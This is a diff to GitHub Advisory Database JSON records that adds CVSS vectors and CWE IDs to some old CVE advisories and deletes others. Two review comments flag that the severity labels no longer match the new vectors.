b/advisories/unreviewed/2022/05/GHSA-f4w3-fh2q-326p/GHSA-f4w3-fh2q-326p.json index fe156007624e4..52fc512175494 100644 --- a/advisories/unreviewed/2022/05/GHSA-f4w3-fh2q-326p/GHSA-f4w3-fh2q-326p.json +++ b/advisories/unreviewed/2022/05/GHSA-f4w3-fh2q-326p/GHSA-f4w3-fh2q-326p.json 
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-f4w3-fh2q-326p", - "modified": "2022-05-02T06:11:28Z", + "modified": "2024-02-03T03:30:26Z", "published": "2022-05-02T06:11:28Z", "aliases": [ "CVE-2010-0302" ], "details": "Use-after-free vulnerability in the abstract file-descriptor handling interface in the cupsdDoSelect function in scheduler/select.c in the scheduler in cupsd in CUPS before 1.4.4, when kqueue or epoll is used, allows remote attackers to cause a denial of service (daemon crash or hang) via a client disconnection during listing of a large number of print jobs, related to improperly maintaining a reference count. NOTE: some of these details are obtained from third party information. NOTE: this vulnerability exists because of an incomplete fix for CVE-2009-3553.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -93,7 +96,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-416" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-f68m-q26r-64f6/GHSA-f68m-q26r-64f6.json b/advisories/unreviewed/2022/05/GHSA-f68m-q26r-64f6/GHSA-f68m-q26r-64f6.json deleted file mode 100644 index a39664b5a0a5e..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-f68m-q26r-64f6/GHSA-f68m-q26r-64f6.json +++ /dev/null 
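Review bot: The added vector `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H` scores 7.5, which is High, while the second hunk keeps `"severity": "MODERATE"` as unchanged context, so the label and the vector in this CUPS advisory now point to different tiers. A consumer that keys off `database_specific.severity` will under-prioritize an unauthenticated remote daemon crash/hang that the vector rates as High availability impact. Unless the label is deliberately sourced elsewhere, the same hunk should change it to `"severity": "HIGH",`. The vector itself (no C/I impact, A:H) and `CWE-416` are consistent with the use-after-free and denial-of-service description.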
@@ -1,39 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-f68m-q26r-64f6", - "modified": "2022-05-17T05:26:20Z", - "published": "2022-05-17T05:26:20Z", - "aliases": [ - "CVE-2010-5142" - ], - "details": "chef-server-api/app/controllers/users.rb in the API in Chef before 0.9.0 does not require administrative privileges for the create, destroy, and update methods, which allows remote authenticated users to manage user accounts via requests to the /users URI.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-5142" - }, - { - "type": "WEB", - "url": "https://github.com/opscode/chef/commit/c3bb41f727fbe00e5de719d687757b24c8dcdfc8" - }, - { - "type": "WEB", - "url": "http://tickets.opscode.com/browse/CHEF-1289" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2012-08-08T10:26:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-f6r7-g7pj-vhjx/GHSA-f6r7-g7pj-vhjx.json b/advisories/unreviewed/2022/05/GHSA-f6r7-g7pj-vhjx/GHSA-f6r7-g7pj-vhjx.json index e08ff39032378..796a05a4bfbd6 100644 --- a/advisories/unreviewed/2022/05/GHSA-f6r7-g7pj-vhjx/GHSA-f6r7-g7pj-vhjx.json +++ b/advisories/unreviewed/2022/05/GHSA-f6r7-g7pj-vhjx/GHSA-f6r7-g7pj-vhjx.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-f6r7-g7pj-vhjx", - "modified": "2022-05-01T01:53:02Z", + "modified": "2024-02-02T15:30:26Z", "published": "2022-05-01T01:53:02Z", "aliases": [ "CVE-2005-0891" ], "details": "Double free vulnerability in gtk 2 (gtk2) before 2.2.4 allows remote attackers to cause a denial of service (crash) via a crafted BMP image.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ 
diff --git a/advisories/unreviewed/2022/05/GHSA-fcmh-7492-g4q9/GHSA-fcmh-7492-g4q9.json b/advisories/unreviewed/2022/05/GHSA-fcmh-7492-g4q9/GHSA-fcmh-7492-g4q9.json deleted file mode 100644 index 78615a7e3901c..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-fcmh-7492-g4q9/GHSA-fcmh-7492-g4q9.json +++ /dev/null @@ -1,35 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-fcmh-7492-g4q9", - "modified": "2022-05-24T16:58:33Z", - "published": "2022-05-24T16:58:33Z", - "aliases": [ - "CVE-2019-17433" - ], - "details": "z-song laravel-admin 1.7.3 has XSS via the Slug or Name on the Roles screen, because of mishandling on the \"Operation log\" screen.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-17433" - }, - { - "type": "WEB", - "url": "https://github.com/z-song/laravel-admin/issues/3847" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": "LOW", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-10-10T12:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-ffj8-w4rj-vr7v/GHSA-ffj8-w4rj-vr7v.json b/advisories/unreviewed/2022/05/GHSA-ffj8-w4rj-vr7v/GHSA-ffj8-w4rj-vr7v.json deleted file mode 100644 index 6c507ce73c9c0..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-ffj8-w4rj-vr7v/GHSA-ffj8-w4rj-vr7v.json +++ /dev/null 
@@ -1,46 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-ffj8-w4rj-vr7v", - "modified": "2022-05-13T01:15:08Z", - "published": "2022-05-13T01:15:08Z", - "aliases": [ - "CVE-2019-1003045" - ], - "details": "A vulnerability in Jenkins ECS Publisher Plugin 1.0.0 and earlier allows attackers with Item/Extended Read permission, or local file system access to the Jenkins home directory to obtain the API token configured in this plugin's configuration.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003045" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-03-25/#SECURITY-846" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/03/28/2" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/107628" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-522" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-03-28T18:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-ffv8-x822-fx73/GHSA-ffv8-x822-fx73.json b/advisories/unreviewed/2022/05/GHSA-ffv8-x822-fx73/GHSA-ffv8-x822-fx73.json deleted file mode 100644 index b924fe97dfc31..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-ffv8-x822-fx73/GHSA-ffv8-x822-fx73.json +++ /dev/null 
@@ -1,46 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-ffv8-x822-fx73", - "modified": "2022-05-13T01:25:15Z", - "published": "2022-05-13T01:25:15Z", - "aliases": [ - "CVE-2019-1003096" - ], - "details": "Jenkins TestFairy Plugin stores credentials unencrypted in job config.xml files on the Jenkins master where they can be viewed by users with Extended Read permission, or access to the master file system.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003096" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-1062" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/107790" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-522" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-04-04T16:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-fhgg-j92h-29rc/GHSA-fhgg-j92h-29rc.json b/advisories/unreviewed/2022/05/GHSA-fhgg-j92h-29rc/GHSA-fhgg-j92h-29rc.json deleted file mode 100644 index abc26b2cc4c83..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-fhgg-j92h-29rc/GHSA-fhgg-j92h-29rc.json +++ /dev/null 
@@ -1,46 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-fhgg-j92h-29rc", - "modified": "2022-05-13T01:25:16Z", - "published": "2022-05-13T01:25:16Z", - "aliases": [ - "CVE-2019-1003091" - ], - "details": "A missing permission check in Jenkins SOASTA CloudTest Plugin in the CloudTestServer.DescriptorImpl#doValidate form validation method allows attackers with Overall/Read permission to initiate a connection to an attacker-specified server.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003091" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-1054" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/107790" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-862" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-04-04T16:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-g2rp-qwrq-qqqq/GHSA-g2rp-qwrq-qqqq.json b/advisories/unreviewed/2022/05/GHSA-g2rp-qwrq-qqqq/GHSA-g2rp-qwrq-qqqq.json deleted file mode 100644 index f93762da293fa..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-g2rp-qwrq-qqqq/GHSA-g2rp-qwrq-qqqq.json +++ /dev/null 
@@ -1,46 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-g2rp-qwrq-qqqq", - "modified": "2022-05-13T01:17:42Z", - "published": "2022-05-13T01:17:42Z", - "aliases": [ - "CVE-2019-1003094" - ], - "details": "Jenkins Open STF Plugin stores credentials unencrypted in its global configuration file on the Jenkins master where they can be viewed by users with access to the master file system.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003094" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-1059" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/107790" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-311" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-04-04T16:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-g3gj-632x-fhrh/GHSA-g3gj-632x-fhrh.json b/advisories/unreviewed/2022/05/GHSA-g3gj-632x-fhrh/GHSA-g3gj-632x-fhrh.json deleted file mode 100644 index 7501441432c67..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-g3gj-632x-fhrh/GHSA-g3gj-632x-fhrh.json +++ /dev/null 
@@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-g3gj-632x-fhrh", - "modified": "2022-05-13T01:31:33Z", - "published": "2022-05-13T01:31:33Z", - "aliases": [ - "CVE-2019-1003028" - ], - "details": "A server-side request forgery vulnerability exists in Jenkins JMS Messaging Plugin 1.1.1 and earlier in SSLCertificateAuthenticationMethod.java, UsernameAuthenticationMethod.java that allows attackers with Overall/Read permission to have Jenkins connect to a JMS endpoint.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003028" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-02-19/#SECURITY-1033" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/107295" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-918" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-02-20T21:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-g3ph-crp3-36hm/GHSA-g3ph-crp3-36hm.json b/advisories/unreviewed/2022/05/GHSA-g3ph-crp3-36hm/GHSA-g3ph-crp3-36hm.json index 98618383428b5..b0cf4098d0194 100644 --- a/advisories/unreviewed/2022/05/GHSA-g3ph-crp3-36hm/GHSA-g3ph-crp3-36hm.json +++ b/advisories/unreviewed/2022/05/GHSA-g3ph-crp3-36hm/GHSA-g3ph-crp3-36hm.json 
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-g3ph-crp3-36hm", - "modified": "2022-05-17T05:45:23Z", + "modified": "2024-02-02T18:30:22Z", "published": "2022-05-17T05:45:23Z", "aliases": [ "CVE-2010-4168" ], "details": "Multiple use-after-free vulnerabilities in OpenTTD 1.0.x before 1.0.5 allow (1) remote attackers to cause a denial of service (invalid write and daemon crash) by abruptly disconnecting during transmission of the map from the server, related to network/network_server.cpp; (2) remote attackers to cause a denial of service (invalid read and daemon crash) by abruptly disconnecting, related to network/network_server.cpp; and (3) remote servers to cause a denial of service (invalid read and application crash) by forcing a disconnection during the join process, related to network/network.cpp.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -65,7 +68,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-416" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-g3rg-cj5x-3vpf/GHSA-g3rg-cj5x-3vpf.json b/advisories/unreviewed/2022/05/GHSA-g3rg-cj5x-3vpf/GHSA-g3rg-cj5x-3vpf.json deleted file mode 100644 index 98e1c98cefc08..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-g3rg-cj5x-3vpf/GHSA-g3rg-cj5x-3vpf.json +++ /dev/null 
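Review bot: The severity label and the new CVSS vector in this OpenTTD record are out of step: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H` scores 7.5 (High), but the second hunk leaves `"severity": "MODERATE"` as an unchanged context line. Three remotely triggerable daemon/application crashes with no authentication fit the vector, so if the label is derived from it the hunk should also set `"severity": "HIGH",`; if the label is intentionally kept from another source, the commit should say so, because the two fields now contradict each other inside one advisory. `CWE-416` matches the "multiple use-after-free vulnerabilities" wording.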
@@ -1,46 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-g3rg-cj5x-3vpf", - "modified": "2022-05-13T01:31:33Z", - "published": "2022-05-13T01:31:33Z", - "aliases": [ - "CVE-2019-10278" - ], - "details": "A cross-site request forgery vulnerability in Jenkins jenkins-reviewbot Plugin in the ReviewboardDescriptor#doTestConnection form validation method allows attackers to initiate a connection to an attacker-specified server.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10278" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-1091" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/107790" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-352" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-04-04T16:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-g7cf-wg27-qw87/GHSA-g7cf-wg27-qw87.json b/advisories/unreviewed/2022/05/GHSA-g7cf-wg27-qw87/GHSA-g7cf-wg27-qw87.json deleted file mode 100644 index dde84db5f18b5..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-g7cf-wg27-qw87/GHSA-g7cf-wg27-qw87.json +++ /dev/null 
@@ -1,62 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-g7cf-wg27-qw87", - "modified": "2022-05-17T00:50:18Z", - "published": "2022-05-17T00:50:18Z", - "aliases": [ - "CVE-2014-9634" - ], - "details": "Jenkins before 1.586 does not set the secure flag on session cookies when run on Tomcat 7.0.41 or later, which makes it easier for remote attackers to capture cookies by intercepting their transmission within an HTTP session.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-9634" - }, - { - "type": "WEB", - "url": "https://github.com/jenkinsci/jenkins/commit/582128b9ac179a788d43c1478be8a5224dc19710" - }, - { - "type": "WEB", - "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=769682" - }, - { - "type": "WEB", - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1185148" - }, - { - "type": "WEB", - "url": "https://issues.jenkins-ci.org/browse/JENKINS-25019" - }, - { - "type": "WEB", - "url": "https://jenkins.io/changelog-old/" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2015/01/22/3" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/72054" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2017-09-12T14:29:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-g857-p997-wx7w/GHSA-g857-p997-wx7w.json b/advisories/unreviewed/2022/05/GHSA-g857-p997-wx7w/GHSA-g857-p997-wx7w.json deleted file mode 100644 index 9c1154bbdb66b..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-g857-p997-wx7w/GHSA-g857-p997-wx7w.json +++ /dev/null 
@@ -1,59 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-g857-p997-wx7w", - "modified": "2022-05-02T03:46:56Z", - "published": "2022-05-02T03:46:56Z", - "aliases": [ - "CVE-2009-3629" - ], - "details": "Multiple cross-site scripting (XSS) vulnerabilities in the Backend subcomponent in TYPO3 4.0.13 and earlier, 4.1.x before 4.1.13, 4.2.x before 4.2.10, and 4.3.x before 4.3beta2 allow remote authenticated users to inject arbitrary web script or HTML via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-3629" - }, - { - "type": "WEB", - "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/53918" - }, - { - "type": "WEB", - "url": "http://marc.info/?l=oss-security&m=125632856206736&w=2" - }, - { - "type": "WEB", - "url": "http://marc.info/?l=oss-security&m=125633199111438&w=2" - }, - { - "type": "WEB", - "url": "http://secunia.com/advisories/37122" - }, - { - "type": "WEB", - "url": "http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-016/" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/36801" - }, - { - "type": "WEB", - "url": "http://www.vupen.com/english/advisories/2009/3009" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-79" - ], - "severity": "LOW", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2009-11-02T15:30:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-ggx9-4728-588r/GHSA-ggx9-4728-588r.json b/advisories/unreviewed/2022/05/GHSA-ggx9-4728-588r/GHSA-ggx9-4728-588r.json deleted file mode 100644 index c8b5e9a7bcd4d..0000000000000 --- a/advisories/unreviewed/2022/05/GHSA-ggx9-4728-588r/GHSA-ggx9-4728-588r.json +++ /dev/null 
@@ -1,219 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-ggx9-4728-588r", - "modified": "2022-05-02T03:37:48Z", - "published": "2022-05-02T03:37:48Z", - "aliases": [ - "CVE-2009-2693" - ], - "details": "Directory traversal vulnerability in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20 allows remote attackers to create or overwrite arbitrary files via a .. (dot dot) in an entry in a WAR file, as demonstrated by a ../../bin/catalina.bat entry.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-2693" - }, - { - "type": "WEB", - "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/55855" - }, - { - "type": "WEB", - "url": "https://lists.apache.org/thread.html/06cfb634bc7bf37af7d8f760f118018746ad8efbd519c4b789ac9c2e@%3Cdev.tomcat.apache.org%3E" - }, - { - "type": "WEB", - "url": "https://lists.apache.org/thread.html/8dcaf7c3894d66cb717646ea1504ea6e300021c85bb4e677dc16b1aa@%3Cdev.tomcat.apache.org%3E" - }, - { - "type": "WEB", - "url": "https://lists.apache.org/thread.html/r3aacc40356defc3f248aa504b1e48e819dd0471a0a83349080c6bcbf@%3Cdev.tomcat.apache.org%3E" - }, - { - "type": "WEB", - "url": "https://lists.apache.org/thread.html/r584a714f141eff7b1c358d4679288177bd4ca4558e9999d15867d4b5@%3Cdev.tomcat.apache.org%3E" - }, - { - "type": "WEB", - "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A19355" - }, - { - "type": "WEB", - "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A7017" - }, - { - "type": "WEB", - "url": "http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02241113" - }, - { - "type": "WEB", - "url": "http://lists.apple.com/archives/security-announce/2010//Mar/msg00001.html" - }, - { - "type": "WEB", - "url": "http://lists.opensuse.org/opensuse-security-announce/2010-04/msg00001.html" - }, - { - "type": "WEB", - "url": 
"http://lists.opensuse.org/opensuse-updates/2012-12/msg00089.html" - }, - { - "type": "WEB", - "url": "http://lists.opensuse.org/opensuse-updates/2012-12/msg00090.html" - }, - { - "type": "WEB", - "url": "http://lists.opensuse.org/opensuse-updates/2013-01/msg00037.html" - }, - { - "type": "WEB", - "url": "http://marc.info/?l=bugtraq&m=127420533226623&w=2" - }, - { - "type": "WEB", - "url": "http://marc.info/?l=bugtraq&m=133469267822771&w=2" - }, - { - "type": "WEB", - "url": "http://marc.info/?l=bugtraq&m=136485229118404&w=2" - }, - { - "type": "WEB", - "url": "http://marc.info/?l=bugtraq&m=139344343412337&w=2" - }, - { - "type": "WEB", - "url": "http://secunia.com/advisories/38316" - }, - { - "type": "WEB", - "url": "http://secunia.com/advisories/38346" - }, - { - "type": "WEB", - "url": "http://secunia.com/advisories/38541" - }, - { - "type": "WEB", - "url": "http://secunia.com/advisories/38687" - }, - { - "type": "WEB", - "url": "http://secunia.com/advisories/39317" - }, - { - "type": "WEB", - "url": "http://secunia.com/advisories/40330" - }, - { - "type": "WEB", - "url": "http://secunia.com/advisories/40813" - }, - { - "type": "WEB", - "url": "http://secunia.com/advisories/43310" - }, - { - "type": "WEB", - "url": "http://secunia.com/advisories/57126" - }, - { - "type": "WEB", - "url": "http://securitytracker.com/id?1023505" - }, - { - "type": "WEB", - "url": "http://support.apple.com/kb/HT4077" - }, - { - "type": "WEB", - "url": "http://svn.apache.org/viewvc?rev=892815&view=rev" - }, - { - "type": "WEB", - "url": "http://svn.apache.org/viewvc?rev=902650&view=rev" - }, - { - "type": "WEB", - "url": "http://tomcat.apache.org/security-5.html" - }, - { - "type": "WEB", - "url": "http://tomcat.apache.org/security-6.html" - }, - { - "type": "WEB", - "url": "http://ubuntu.com/usn/usn-899-1" - }, - { - "type": "WEB", - "url": "http://www.debian.org/security/2011/dsa-2207" - }, - { - "type": "WEB", - "url": 
"http://www.mandriva.com/security/advisories?name=MDVSA-2010:176" - }, - { - "type": "WEB", - "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2010:177" - }, - { - "type": "WEB", - "url": "http://www.redhat.com/support/errata/RHSA-2010-0119.html" - }, - { - "type": "WEB", - "url": "http://www.redhat.com/support/errata/RHSA-2010-0580.html" - }, - { - "type": "WEB", - "url": "http://www.redhat.com/support/errata/RHSA-2010-0582.html" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/archive/1/509148/100/0/threaded" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/archive/1/516397/100/0/threaded" - }, - { - "type": "WEB", - "url": "http://www.securityfocus.com/bid/37944" - }, - { - "type": "WEB", - "url": "http://www.vmware.com/security/advisories/VMSA-2011-0003.html" - }, - { - "type": "WEB", - "url": "http://www.vmware.com/support/vsphere4/doc/vsp_vc41_u1_rel_notes.html" - }, - { - "type": "WEB", - "url": "http://www.vupen.com/english/advisories/2010/0213" - }, - { - "type": "WEB", - "url": "http://www.vupen.com/english/advisories/2010/1559" - }, - { - "type": "WEB", - "url": "http://www.vupen.com/english/advisories/2010/1986" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-22" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2010-01-28T20:30:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/05/GHSA-ghp8-rg92-746w/GHSA-ghp8-rg92-746w.json b/advisories/unreviewed/2022/05/GHSA-ghp8-rg92-746w/GHSA-ghp8-rg92-746w.json index fd0fd76e03849..8cf6dd157c7cf 100644 --- a/advisories/unreviewed/2022/05/GHSA-ghp8-rg92-746w/GHSA-ghp8-rg92-746w.json +++ b/advisories/unreviewed/2022/05/GHSA-ghp8-rg92-746w/GHSA-ghp8-rg92-746w.json 
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-ghp8-rg92-746w", - "modified": "2022-05-01T01:47:09Z", + "modified": "2024-02-08T21:30:30Z", "published": "2022-05-01T01:47:09Z", "aliases": [ "CVE-2005-0102" ], "details": "Integer overflow in camel-lock-helper in Evolution 2.0.2 and earlier allows local users or remote malicious POP3 servers to execute arbitrary code via a length value of -1, which leads to a zero byte memory allocation and a buffer overflow.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -69,7 +72,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-190" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-ghqg-gfm6-qhh6/GHSA-ghqg-gfm6-qhh6.json b/advisories/unreviewed/2022/05/GHSA-ghqg-gfm6-qhh6/GHSA-ghqg-gfm6-qhh6.json index be43d08dfe1e9..1e24ab7af6a95 100644 --- a/advisories/unreviewed/2022/05/GHSA-ghqg-gfm6-qhh6/GHSA-ghqg-gfm6-qhh6.json +++ b/advisories/unreviewed/2022/05/GHSA-ghqg-gfm6-qhh6/GHSA-ghqg-gfm6-qhh6.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-ghqg-gfm6-qhh6", - "modified": "2022-05-01T01:56:00Z", + "modified": "2024-02-08T21:30:30Z", "published": "2022-05-01T01:56:00Z", "aliases": [ "CVE-2005-1141" ], "details": "Integer overflow in the readpgm function in pnm.c for GOCR 0.40, when using the netpbm library, allows remote attackers to execute arbitrary code via a PNM file with large width and height values, which leads to a heap-based buffer overflow.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -29,7 +32,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-190" ], "severity": "HIGH", "github_reviewed": false, 
